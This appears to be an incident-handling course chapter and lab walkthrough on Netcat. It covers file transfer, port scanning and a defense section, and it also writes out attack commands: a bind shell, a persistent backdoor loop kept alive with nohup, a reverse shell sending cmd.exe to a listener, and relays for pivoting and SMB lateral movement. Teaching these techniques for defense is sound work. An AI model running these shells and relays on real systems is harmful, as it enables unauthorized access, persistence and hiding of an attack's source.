Multipurpose Netcat

Netcat and its versions are powerful hacking tools. Like the UNIX cat command, it helps send data over a network through TCP or UDP ports. There are several Netcat clones, including GNU Netcat, which tries to match the original. Netcat is available for Windows, Linux, and other UNIX systems.

The Nmap team made a tool called Ncat, which is like Netcat but better. It supports SSL/TLS encryption and allows multiple clients to connect to one listener at the same time, unlike the original Netcat, which allows only one. Ncat also has easy relay features and can help systems behind NAT connect through a broker. As a broker, it listens on a port and passes messages between connected clients. It also has a chat feature that shows messages with user numbers.

This incident handling class focuses on the original Netcat because attackers often use it, and it's included in many Linux systems.

Netcat Client Mode

Netcat is a client by default. You specify the system and port to connect to. You can send a program's output to Netcat or pass Netcat's received data into a program, and also save its output to a file. It works like "cat" over a network, with error messages sent to standard error.

Netcat Listen Mode

Using the -l option, Netcat listens on a specified port (TCP or UDP). It shows incoming data on the screen by default or can send it to a file or another application.

If we look closely, we'll see this picture is a mirror of the last one. The difference is that clients start the connection, and listeners wait. Both use the network the same way for input and output.

Netcat: Data Transfer

Netcat is often used to transfer data between systems. We can hide the transfer by using ports like UDP 53, which looks like DNS traffic. Even for normal use, it's simpler to use Netcat on an allowed port than using a complex protocol like FTP.

To send files between systems, we have the following options:

Option 1) To move a file from listener back to client:

  • listener: nc -l -p 1234 < filename

  • client: nc listenerIP 1234 > filename

Option 2) To push a file from client to listener:

  • listener: nc -l -p 1234 > filename

  • client: nc listenerIP 1234 < filename

We can use a browser for option 1. Netcat file transfer works with TCP or UDP, and we can set the listener to accept connections from a specific IP, similar to how a TCP wrapper filters connections.

Netcat: Port Scanning

Netcat can do basic port scans by completing the TCP handshake or sending data to a UDP port. It's not as advanced or stealthy as Nmap but still useful. The command shown scans a range of ports. The -v option makes it show each connection (open ports), -w3 sets a 3-second timeout for responses, and -z sends minimal data, just enough to check if a port is open.

$ nc -v -w3 -z targetIP startport-endport

To do a port scan from source port 80, add -p 80 to the command. The -p flag sets the source port on the client side.

Let's jump into a Lightning Labs event to reinforce this learning objective.

1) Netcat isn't a replacement for Nmap as a port scanner, but it can be used in a pinch. Scan the target system at 10.20.20.37 for several common ports between 21 and 25. Add the arguments -vvv to make Netcat verbose, -z to use zero I/O mode, and -w 1 to wait for a response on the port for 1 second.

nc -vvv -z -w 1 10.20.20.37 21-25

Netcat's output returns three types of responses:

  • succeeded indicates that the port is open

  • timed out indicates that there is a firewall blocking access

  • refused indicates that the port is not open

2) Netcat can't specify non-contiguous port ranges when scanning, but we can run Netcat multiple times, testing each port in sequence. Use Netcat to scan several other common ports: 80, 443, 445, and 3389.

nc -vvv -z -w 1 10.20.20.37 80
nc -vvv -z -w 1 10.20.20.37 443
nc -vvv -z -w 1 10.20.20.37 445
nc -vvv -z -w 1 10.20.20.37 3389

In this output, and the output from the earlier scan, we learn that the system is listening on TCP ports 21 (FTP), 22 (SSH), and 80 (HTTP).

3) Netcat can also connect to a port to get banner information from the listening port. Connect to the 10.20.20.37 target on TCP port 22, removing the -z and -w options to retrieve the SSH server banner information.

nc -vvv 10.20.20.37 22

Netcat returns the banner information from the SSH server, identifying the system as using OpenSSH 9.1. This can be useful information for an attacker when looking for SSH vulnerabilities.

4) We can use Netcat to interact with text-based protocols such as HTTP by entering HTTP protocol requests. Return to the previous command, this time changing the port number to 80.

nc -vvv 10.20.20.37 80

5) Send an HTTP GET request through the Netcat session by entering the string below, then press enter twice.

The HTTP server responds to the Netcat client's request.

Netcat in client mode can be useful for several tasks: port scanning, banner collection, and even interacting with HTTP protocols.

Netcat: Backdoors

Netcat can be used to create a backdoor login shell. By setting up a Netcat listener on a port with the -e option, it starts a shell (or any program) when someone connects. If we use /bin/sh or cmd.exe, we don't need to log in again—we’re already logged in as the user who set up Netcat.

Netcat: Persistent Backdoor Listeners

The listen harder feature is only in the Windows version of Netcat and not in most Linux or UNIX versions. Some modified Netcat versions for Linux/UNIX have added this feature, but they're not very common.

An attacker can make a Netcat listener persistent on UNIX and Linux by using a while loop, invoking the following command:

while [ 1 ]; do echo "Started"; nc -l -p port -e /bin/sh; done

When run, this command shows "Started," listens on a TCP port, and opens a shell (/bin/sh) when someone connects. After the shell closes, it repeats: showing "Started" and listening again. This creates a persistent listener using Netcat and a while loop. However, if the attacker logs out, the listener stops because the user is gone.

To fix the issue and create a persistent listener that works even after logging out, the attacker can save the loop code into a file named listener.sh. They can then make this file readable and executable with the following command:

$ chmod 555 listener.sh

Then the attacker can invoke this loop in the background by using the nohup command, as follows:

$ nohup ./listener.sh &

On UNIX and Linux, the nohup command keeps a process running even if the user logs out. This ensures the listener remains active, giving the attacker persistent access to the system.

Netcat: Relays

Netcat can be used to pass an attack through one or more compromised systems. For example, if an attacker controls a system at 10.10.10.10 and wants to attack a web server at 10.10.10.100, but a firewall blocks direct access, they can use Netcat to send the attack from their system, through the compromised system, to the target server.

To accommodate this, the attacker runs Netcat on the relay system at 10.10.10.10. By listening on a new TCP port (nc -l -p 2222) and forwarding that activity to the target system (nc 10.10.10.100 80), the relay system allows the attacker to bypass firewall restrictions and access the desired target.

An advantage for attackers is that using a relay hides where the attack really started. Logs on 10.10.10.100 will show the attack came from 10.10.10.10, but that’s just a relay controlled by the attacker. Attackers can use multiple relays to further hide their true source. We’ll discuss this more in section 5 about post-exploitation.

The example lets the attacker send data to the target through the victim but needs a named pipe to get the response back.

Make a Netcat Relay on Linux

To set up a Netcat relay on Linux or UNIX, we can use a FIFO file (also called a named pipe). We can create this file with the mkfifo command.

$ mkfifo backpipe

This command creates a FIFO file called backpipe to send data between processes (the name backpipe is just a placeholder; you can choose any name). Named pipes work like unnamed pipes we’ve used before (e.g., ls | grep filename, where | is the unnamed pipe). Named pipes let you pass data between programs using a file instead of a simple command chain.

Next, the attacker starts two invocations of the Netcat command:

$ nc -l -p 2222 | nc 10.10.10.100 80

In this example, the relay box listens on TCP port 2222. Any activity received on this port is sent through a pipe to a Netcat client, which then forwards the data to the target web server at 10.10.10.100.

This example works, but it only relays responses back to the relay server (10.10.10.100) and not to the attacker. To make it a full relay, we include the named pipe in the command.

$ nc -l -p 2222 < backpipe | nc 10.10.10.100 80 > backpipe

Here's a simpler summary:

  1. The relay listens for attacker traffic on TCP/2222.

  2. The relay sends the attacker's activity to the Netcat client on the target server.

  3. The server's response is written to a named pipe called "backpipe."

  4. The Netcat listener reads the data from the backpipe and sends it back to the attacker.

Netcat: Defense

The defense against Netcat depends on the mode in which it is used. To summarize:

  • Data transfer: Understand what's running on your systems and stop any processes using unusual ports.

  • Port scanner: Close all unused ports.

  • Connecting to open ports: Close all unused ports.

  • Backdoors: Monitor your systems to see what’s running and stop any processes using strange ports.

  • Relays: To protect against relays, design your network with strong, layered security. Set up firewalls within your network to create checkpoints and use private VLANs (PVLANs) to isolate traffic between systems. This makes it harder for attackers to move around and bypass your security measures.

Lab 3.5: Netcat's Many Uses

Netcat is a powerful tool. In this lab, we will use four different modes of Netcat:

  • Making connections to open ports

  • Data transfer (moving files)

  • Backdoors

  • Relays

In this lab, we'll be making extensive communication from our Linux VM to our Windows VM, and vice versa.

Let's test connectivity to the Windows VM using the ping utility:

ping 10.10.0.1

Let's do this step again, but now check the connection from the Windows VM to the Linux VM using PowerShell.

ping 10.10.75.1

Mode 1: Simple Client and Listener "Chat"

Let's set up a listener on the Linux VM, then connect to it from Windows. Whatever we type on one machine will show up on the other.

nc -l -p 2222

Let's switch to our Windows VM and use PowerShell to connect to the Linux Netcat listener.

nc 10.10.75.1 2222

Next, let's type a message in the client (Windows) or the listener (Linux) and press Enter.

Mode 2: Pull a File

Next, let's set up a listener on Windows to wait for a client to connect and receive a file. Then, we'll use the Linux client to connect to the Windows listener and get the file.

First, let's create the file to transfer.

"this is text" | Out-File -FilePath text.txt

Let's create a listener on a local port and direct the text file to this listener.

Get-Content .\text.txt | nc -l -p 1234

Let's switch to our Linux VM. In the terminal, set up a Netcat client to connect to the listener, download the file, and save it as received.txt.

nc 10.10.0.1 1234 > received.txt

Mode 2: Push a File

In the last step, we set up a listener to send a file that we got from the target using a client connection.

Next, let's set up a listener to wait for a client to connect and send a file to it.

nc -l -p 4321 | Out-File -FilePath received2.txt

Next, let's go to our Linux VM and set up a Netcat client to send the file.

cat file.txt | nc 10.10.0.1 4321

Let's ensure the file is transferred to our Windows machine.

Mode 3: Create a Linux Backdoor

Now let’s set up a backdoor shell on the Linux VM. We’ll create a shell listener on Linux and connect to it from the Windows VM.

In the Linux terminal, let's use this Netcat command to listen on TCP port 7777 and start the sh shell when a client connects:

nc -l -p 7777 -e /bin/bash

Let's switch to the PowerShell on the Windows VM and set up a Netcat client to connect to the listener on the Linux VM.

nc 10.10.75.1 7777

Commands typed on the attacker's Windows VM are sent to the listener on the victim's Linux VM, where they are run. The victim's screen doesn't show any output because it’s sent back to the attacker’s screen through Netcat, as the output is connected to the command shell on the victim machine.

Mode 3: Reverse Windows Shell

In the last step, we set up a listener to wait for a connection before running a shell. Now, we'll create a reverse shell connection by using Netcat on Windows to connect to a Netcat listener on Linux. This means we'll make the Windows client connect to the Linux listener, which will allow us to run commands on the Linux machine from the Windows client.

First, let's create a listener in the Linux VM that will be our attacking system:

nc -l -p 8888

This listener just waits for a connection. When a client connects, it sends back whatever we type. The attacker runs this command on their own machine.

Next, we’ll connect to the server by sending a shell as a client. This is something an attacker would do on the victim’s machine to create a reverse TCP shell connection.

nc 10.10.75.1 8888 -e cmd.exe

Let's go back to the Linux VM (attacker system). We'll see that the Netcat listener now shows a Windows Command Prompt. This happens because the Netcat client sent a cmd.exe shell to the listener, which then sends the Command Prompt output back to the Linux system.

Let's try some commands.

Mode 4: Create Linux Relay

Next, we'll set up a Linux Netcat relay. Our task is to find a command that will send a curl request through a pivot system to get a CTF hint from the protected target system.

In this case, we'll open three terminal windows on Slingshot Linux.

In the target terminal window, let's run the gonctarget command. Leave the command running. This is the web server target.

In the pivot terminal window, let's run the goncpivot command. We will see a new shell prompt. Our Slingshot Linux system will match the following example.

These three terminals will represent three different systems, as shown in this illustration.

Let's use a Netcat relay to get the contents of the web server at 172.30.0.55 with curl. We can't access the web server directly from the attacker terminal.

nc -vvv -z -w3 172.30.0.55 80

We tried to connect to the target system at 172.30.0.55 using Netcat's zero I/O mode with a 3-second timeout. The command showed a connection timeout, which means we can't directly connect to the web server because the target system's firewall is blocking access.

In this case, imagine an attacker has taken over the internal pivot system, which can then connect to the target host, as shown here.

nc -vvv -z -w3 172.30.0.50 80

Running the Netcat connection test from the pivot system shows that the firewall isn't blocking access to the web server. However, the pivot system is missing the curl command.

curl http://172.30.0.55

In this scenario, the pivot system can listen on a TCP port, redirecting the tracffic on the port to the target system as shown here.

To listen on port TCP/8080, the pivot system will use Netcat with the command: nc -l -p 8080. We need to forward traffic from TCP/8080 to the target system on TCP/80 using: nc 172.30.0.55 80. The goal is to direct traffic from the listener to the target and make sure that the response from the target returns through the pivot to the attacker.

For this exercise, we need to set up a relay on the pivot system. To keep it simple, the pivot system should listen on TCP/8080 and forward traffic to the target system. We can use a basic unnamed pipe ( | ) for one-way traffic, but for the traffic to go back to the attacker, we'll also need a named pipe.

Let's create a named pipe on the pivot host, called namedpipe. The name of the pipe doesn't matter; we're just using namedpipe as an example.

mkfifo namedpipe
ls -l namedpipe

Once the named pipe is created, we can create the pivot relay using Netcat.

nc -l -p 8080 < namedpipe | nc 172.30.0.55 80 > namedpipe

Next, let's use curl to send a request from the attacker system to the pivot system on port TCP/8080. 

curl http://172.30.0.50:8080

We accessed the target web server through a pivot point using Netcat relay. This is confirmed by the logging information on the web server.

Note that the web server records the HTTP GET request as coming from 172.30.0.50 (the pivot host), not the attacker.

SMB Relay Bonus

Netcat gives attackers many useful features, like creating shells and moving data. It's also handy for moving laterally within a network. In this extra lab, let's start the SMB target container from the Linux host using the gosmbtgt command.

gosmbtgt

In the network diagram, an attacker has compromised the Linux system at 10.10.75.1. They now want to steal data from another Linux host at 172.30.0.22 using SMB from their Windows system.

Netcat can be used for moving laterally and pivoting through the Linux system at 10.10.75.1. Let's use this Linux system to let Windows connect to the system at 172.30.0.22 with the command net use * \\targetip\data /U:erigby weddingrice.

The relay needs to accept traffic from the Windows machine on TCP/445 and forward it to TCP/445 on the SMB target server at 172.30.0.22. On Linux, only the root user can open listeners on ports below 1024. To listen on such a port, we must run Netcat with sudo. From the terminal on the Linux host at 10.10.75.1, let's set up a relay to tunnel TCP/445 through the Linux system.

mkfifo namedpipe
sudo nc -l -p 445 < namedpipe | nc 172.30.0.22 445 > namedpipe

Let's switch to the Windows VM and connect to the SMB target by using Netcat on the 10.10.75.1 system. Use net use * to assign a drive letter to the share, then run net use without any arguments to see the connected shares.

net.exe use * \\10.10.75.1\data /u:erigby weddingrice

Using Netcat, we've set up a pivot point. Before, the attacker couldn't connect from Windows to the Linux SMB system, but now connections to the Linux system at 10.10.75.1 on TCP/445 are automatically forwarded to the SMB target. This Netcat relay method lets the attacker expand access to new targets through the first compromised host.

Once the session is established, use the command line to connect to the SMB target system and access its available data.

PreviousCloud Spotlight: Insecure StorageNextBook Four

Last updated